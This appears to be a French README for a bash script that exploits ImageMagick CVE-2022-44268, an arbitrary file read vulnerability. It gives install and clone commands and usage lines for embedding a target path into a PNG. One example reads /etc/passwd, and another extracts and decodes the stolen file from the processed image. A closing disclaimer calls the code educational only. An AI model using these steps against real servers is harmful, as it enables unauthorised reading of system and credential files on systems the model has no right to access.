
Un script bash pour exploiter facilement la vulnérabilité de lecture arbitraire de fichiers d'ImageMagick CVE-2022-44268
Un script bash pour exploiter facilement la vulnérabilité de lecture arbitraire de fichiers d'ImageMagick CVE-2022-44268
Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org
Copyright: (C) 1999-2021 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC Modules OpenMP(4.5)
Delegates (built-in): bzlib djvu fftw fontconfig freetype heic jbig jng jp2 jpeg lcms lqr ltdl lzma openexr pangocairo png tiff webp wmf x xml zlib
sudo apt-get install imagemagick exiftool pngcrush exiv2 -y
git clone https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268.git
cd Exploit-for-ImageMagick-CVE-2022-44268
chmod 750 script.sh
./script.sh -p [Chemin à lire] [Image PNG] [Sortie[Optionnel, si non utilisé par défaut pngout.png]]
./script.sh -d [PNG]
Exemples
./script.sh -p /etc/passwd sample.png output.png
./script.sh -d pngout.png
Options
-h = Afficher l'aide
-p = Ajouter l'exploit à une image PNG
-d = Extraire et décoder le fichier lu
Tout le code fourni sur ce dépôt est uniquement à des fins éducatives/de recherche. Toute action et/ou activité liée au contenu de ce dépôt relève de votre seule responsabilité. Une mauvaise utilisation du code de ce dépôt peut entraîner des poursuites pénales contre les personnes concernées. L'auteur ne sera pas tenu responsable en cas de poursuites pénales engagées contre toute personne utilisant à mauvais escient le code de ce dépôt pour enfreindre la loi.